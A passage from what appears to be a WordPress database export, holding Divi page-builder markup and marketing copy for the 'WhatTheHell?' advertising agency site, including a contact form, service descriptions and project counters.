button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2021-03-22 12:02:48','2021-03-22 12:02:48','',392,'https://wthtest1.in8.cdn-alpha.com/?p=797',0,'revision','',0),(801,1,'2021-03-23 11:48:40','2021-03-23 11:48:40','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.6\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/03/banner-1.jpeg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising Agency</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Packed with creative skills; we have been serving as one of the best agencies in the region.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"creative advertising agency in Delhi\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"digital agency\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner 